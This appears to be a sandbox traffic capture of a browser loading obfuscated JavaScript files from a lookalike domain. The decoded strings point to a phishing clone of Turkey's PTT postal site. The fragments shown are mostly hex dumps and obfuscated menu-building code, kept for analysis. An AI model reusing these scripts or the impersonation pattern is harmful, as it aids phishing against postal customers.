                                                                                                                                                                                            2024-09-28 03:39:25 UTC532OUTGET /help/assets/09bf01f8JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC360INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 1965
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"7ad-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC1965INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 37 32 36 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 39 30 66 62 36 3d 5b 27 74 6f 53 74 72 69 6e 67 27 2c 27 61 70 70 6c 79 27 2c 27 31 32 31 37 32 38 30 6d 46 59 53 68 67 27 2c 27 37 34 35 31 30 31 48 74 47 52 79 7a 27 2c 27 35 6b 47 7a 6a 5a 66 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2c 27 73 65 61 72 63 68 27 2c 27 32 31 34 34 31 33 33 57 78 78 57 57 65 27 2c 27 72 65 6d 6f 76 65 27 2c 27 31 33 36 38 38 31 32 57 71 49 75 52 76 27 2c 27 6e 6f 6f 70 65 6e 65 72 27 2c 27 63 6c 69 63 6b 27 2c 27 32 32 32 36 35 37 34 56 6a 6b 4e 68 68 27 2c 27 34 34 39 33 36 38 6a 7a 6a 62 71 74 27 2c 27 34 32 35 36 39 37 36 4d 69 68 75 43 76 27 2c 27 61 70 70 65 6e 64 27 2c 27 62 6f 64 79 27 2c 27 72 65 6c 27 2c 27 63 6f 6e 73 74
                                                                                                                                                                                            Data Ascii: function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','const


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            15192.168.2.5497298.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC532OUTGET /help/assets/ec21517bJxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC360INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 2711
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"a97-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC2711INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 64 38 37 64 62 2c 5f 30 78 34 62 35 65 34 37 29 7b 63 6f 6e 73 74 20 5f 30 78 66 65 62 32 31 65 3d 61 33 31 5f 30 78 33 35 35 65 2c 5f 30 78 34 31 64 34 65 34 3d 5f 30 78 33 64 38 37 64 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 66 34 63 35 34 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 63 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62
                                                                                                                                                                                            Data Ascii: (function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            16192.168.2.5497338.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC532OUTGET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 161114
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"2755a-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16020INData Raw: 63 6f 6e 73 74 20 61 33 33 5f 30 78 37 36 32 63 37 31 3d 61 33 33 5f 30 78 64 61 36 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 32 30 33 39 2c 5f 30 78 33 34 61 33 38 65 29 7b 63 6f 6e 73 74 20 5f 30 78 33 30 33 62 61 65 3d 61 33 33 5f 30 78 64 61 36 65 2c 5f 30 78 32 32 66 32 35 61 3d 5f 30 78 31 64 32 30 33 39 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 63 31 65 34 62 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 31 66 34 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 34 38 61 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 33 62 61 65 28 30 78 38 34 33 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30
                                                                                                                                                                                            Data Ascii: const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt(_0x30
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 66 3d 5c 78 32 32 68 27 2c 27 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 27 2c 27 61 76 61 6c 65 5c 78 32 30 48 69 7a 6d 27 2c 27 2d 34 34 27 2c 27 72 69 7a 5c 78 32 30 54 c3 bc 72 6b 69 79 27 2c 27 72 6d 65 6e 75 27 2c 27 65 6d 5f 70 74 74 5f 6c 6f 67 27 2c 27 5c 78 32 32 41 6a 61 78 4c 69 6e 6b 5c 78 32 32 27 2c 27 75 63 75 6c 75 6b 5c 78 32 32 3e 3c 61 27 2c 27 65 62 61 70 70 72 6f 6f 74 2f 27 2c 27 69 6d 69 7a 2e 61 73 70 78 27 2c 27 72 2f 6f 6e 6c 69 6e 65 54 65 27 2c 27 52 70 64 6a 34 38 5a 47 6c 32 27 2c 27 65 6d 5f 70 74 74 5f 74 65 6c 27 2c 27 65 6d 5f 6c 6f 6a 69 73 74 69 27 2c 27 61 2e 61 73 70 78 23 70 74 74 27 2c 27 6b 61 72 74 5f 70 74 74 6d 61 27 2c 27 65 73 61 70 5c 78 32 30 42 69 6c 64 69 27 2c 27 39 73 4c 58 68 7a 4c 54 51 6e 27 2c
                                                                                                                                                                                            Data Ascii: f=\x22h','iv\x20class=\x22','avale\x20Hizm','-44','riz\x20Trkiy','rmenu','em_ptt_log','\x22AjaxLink\x22','uculuk\x22><a','ebapproot/','imiz.aspx','r/onlineTe','Rpdj48ZGl2','em_ptt_tel','em_lojisti','a.aspx#ptt','kart_pttma','esap\x20Bildi','9sLXhzLTQn',
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 35 31 29 5d 29 5b 27 68 72 65 66 27 5d 2c 53 3d 27 27 2b 6e 65 77 20 55 52 4c 28 27 2e 2e 2f 6c 61 79 6f 75 74 2f 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 36 36 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 62 64 29 2c 69 6d 70 6f 72 74 2e 6d 65 74 61 5b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 35 31 29 5d 29 5b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 39 61 29 5d 2c 78 3d 27 27 2b 6e 65 77 20 55 52 4c 28 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 61 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 66 30 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 62 64 29 2c 69 6d 70 6f 72 74 2e 6d 65 74 61 5b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 35 31 29
                                                                                                                                                                                            Data Ascii: a33_0x762c71(0x851)])['href'],S=''+new URL('../layout/'+a33_0x762c71(0x866)+a33_0x762c71(0x7bd),import.meta[a33_0x762c71(0x851)])[a33_0x762c71(0x59a)],x=''+new URL(a33_0x762c71(0x4a1)+a33_0x762c71(0x3f0)+a33_0x762c71(0x7bd),import.meta[a33_0x762c71(0x851)
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 63 37 31 28 30 78 31 30 37 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 31 37 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 34 66 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 38 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 31 35 63 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 39 30 29 2b 27 46 73 61 53 63 2b 50 47 52 70 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 62 35 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 39 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 39 34 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 31 66 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 35 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 39 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31
                                                                                                                                                                                            Data Ascii: c71(0x107)+a33_0x762c71(0x17d)+a33_0x762c71(0x54f)+a33_0x762c71(0x58d)+a33_0x762c71(0x15c)+a33_0x762c71(0x890)+'FsaSc+PGRp'+a33_0x762c71(0xb5)+a33_0x762c71(0x893)+a33_0x762c71(0x594)+a33_0x762c71(0x51f)+a33_0x762c71(0x651)+a33_0x762c71(0x69d)+a33_0x762c71
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 63 37 31 28 30 78 31 63 30 29 2b 27 72 61 70 27 2c 27 72 6f 6c 65 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 64 39 29 2c 27 69 64 27 3a 27 73 6d 2d 31 36 38 38 38 38 38 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 33 34 29 2b 27 2d 32 27 2c 27 61 72 69 61 2d 68 69 64 64 65 6e 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 64 30 29 2c 27 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 27 3a 27 73 6d 2d 31 36 38 38 38 38 38 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 33 34 29 2b 27 2d 31 27 2c 27 61 72 69 61 2d 65 78 70 61 6e 64 65 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 37 63 29 7d 2c 5b 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 6c 69 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28
                                                                                                                                                                                            Data Ascii: c71(0x1c0)+'rap','role':a33_0x762c71(0x3d9),'id':'sm-1688888'+a33_0x762c71(0x234)+'-2','aria-hidden':a33_0x762c71(0x2d0),'aria-labelledby':'sm-1688888'+a33_0x762c71(0x234)+'-1','aria-expanded':a33_0x762c71(0x47c)},[a33_0x24c54e('li',{'class':a33_0x762c71(
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 63 37 31 28 30 78 33 66 36 29 2c 27 68 72 65 66 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 35 66 29 2b 27 77 2e 70 74 74 2e 67 6f 76 2e 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 64 63 29 2b 27 72 2f 50 6f 73 74 61 2f 50 6f 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 63 39 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 36 37 29 2b 27 78 27 2c 27 61 72 69 61 2d 68 61 73 70 6f 70 75 70 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 64 30 29 2c 27 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 27 3a 27 73 6d 2d 31 36 38 38 38 38 38 27 2b 27 34 38 33 33 36 32 30 38 31 33 27 2b 27 2d 31 36 27 2c 27 61 72 69 61 2d 65 78 70 61 6e 64 65 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 37 63 29 7d 2c 5b 61 33 33 5f 30
                                                                                                                                                                                            Data Ascii: c71(0x3f6),'href':a33_0x762c71(0x55f)+'w.ptt.gov.'+a33_0x762c71(0x3dc)+'r/Posta/Po'+a33_0x762c71(0x5c9)+a33_0x762c71(0x367)+'x','aria-haspopup':a33_0x762c71(0x2d0),'aria-controls':'sm-1688888'+'4833620813'+'-16','aria-expanded':a33_0x762c71(0x47c)},[a33_0
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 31 28 30 78 35 61 33 29 2b 27 34 38 33 33 36 32 30 38 31 33 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 36 65 29 2c 27 68 72 65 66 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 35 66 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 34 65 29 2b 27 74 72 2f 53 61 79 66 61 6c 61 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 36 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 62 32 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 63 33 29 2b 27 2e 61 73 70 78 27 2c 27 61 72 69 61 2d 68 61 73 70 6f 70 75 70 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 64 30 29 2c 27 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 61 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30
                                                                                                                                                                                            Data Ascii: 1(0x5a3)+'4833620813'+a33_0x762c71(0x36e),'href':a33_0x762c71(0x55f)+a33_0x762c71(0x64e)+'tr/Sayfala'+a33_0x762c71(0x563)+a33_0x762c71(0xb2)+a33_0x762c71(0x3c3)+'.aspx','aria-haspopup':a33_0x762c71(0x2d0),'aria-controls':a33_0x762c71(0x5a3)+a33_0x762c71(0
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 30 78 37 36 32 63 37 31 28 30 78 65 36 29 29 5d 29 5d 29 5d 29 2c 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 6c 69 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 30 31 29 2b 27 65 6d 27 2c 27 69 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 64 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 64 30 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 35 35 29 2b 27 6d 6c 65 72 69 27 7d 2c 5b 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 61 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 65 37 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 30 63 29 2b 27 61 67 65 5c 78 32 30 68 61 73 2d 73 75 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 30 37 29 2c 27 69 64 27
                                                                                                                                                                                            Data Ascii: 0x762c71(0xe6))])])]),a33_0x24c54e('li',{'class':a33_0x762c71(0x801)+'em','id':a33_0x762c71(0x6dd)+a33_0x762c71(0x8d0)+a33_0x762c71(0x355)+'mleri'},[a33_0x24c54e('a',{'class':a33_0x762c71(0x5e7)+a33_0x762c71(0x50c)+'age\x20has-su'+a33_0x762c71(0x207),'id'
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 5d 29 2c 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 6c 69 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 30 31 29 2b 27 65 6d 27 2c 27 69 64 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 36 64 64 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 63 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 30 34 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 34 38 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 61 37 29 7d 2c 5b 61 33 33 5f 30 78 32 34 63 35 34 65 28 27 61 27 2c 7b 27 63 6c 61 73 73 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 65 37 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 30 63 29 2b 27 61 67 65 27 2c 27 68 72 65 66 27 3a 61 33 33 5f 30 78 37 36 32 63 37 31 28 30
                                                                                                                                                                                            Data Ascii: ]),a33_0x24c54e('li',{'class':a33_0x762c71(0x801)+'em','id':a33_0x762c71(0x6dd)+a33_0x762c71(0x4c1)+a33_0x762c71(0x404)+a33_0x762c71(0x548)+a33_0x762c71(0x3a7)},[a33_0x24c54e('a',{'class':a33_0x762c71(0x5e7)+a33_0x762c71(0x50c)+'age','href':a33_0x762c71(0
                                                                                                                                                                                            2024-09-28 03:39:26 UTC14022INData Raw: 63 37 31 28 30 78 34 61 66 29 2b 27 75 79 61 72 69 5c 78 32 32 5c 78 32 30 63 6c 61 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 38 37 31 29 2b 27 3e 59 61 73 61 6c 5c 78 32 30 55 79 61 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 61 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33 34 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 38 63 29 2b 27 6d 5f 70 74 74 5f 62 69 6c 67 27 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 36 34 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 35 39 31 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 37 62 33 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 32 37 63 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 34 36 65 29 2b 61 33 33 5f 30 78 37 36 32 63 37 31 28 30 78 33
                                                                                                                                                                                            Data Ascii: c71(0x4af)+'uyari\x22\x20cla'+a33_0x762c71(0x871)+'>Yasal\x20Uya'+a33_0x762c71(0x4a3)+a33_0x762c71(0x343)+a33_0x762c71(0x28c)+'m_ptt_bilg'+a33_0x762c71(0x764)+a33_0x762c71(0x591)+a33_0x762c71(0x7b3)+a33_0x762c71(0x27c)+a33_0x762c71(0x46e)+a33_0x762c71(0x3


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            17192.168.2.5497258.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC364OUTGET /help/assets/77985128JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC361INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 4708
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"1264-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC4708INData Raw: 63 6f 6e 73 74 20 61 31 36 5f 30 78 31 61 30 61 62 31 3d 61 31 36 5f 30 78 62 33 30 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 63 36 32 30 32 37 2c 5f 30 78 34 63 33 35 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 32 35 31 37 3d 61 31 36 5f 30 78 62 33 30 39 2c 5f 30 78 31 38 66 32 38 38 3d 5f 30 78 63 36 32 30 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 61 36 34 62 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 34 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 33 66 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 32 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37
                                                                                                                                                                                            Data Ascii: const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            18192.168.2.5497348.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:26 UTC364OUTGET /help/assets/37d8eb31JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC362INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 53104
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"cf70-18fc3d84650"
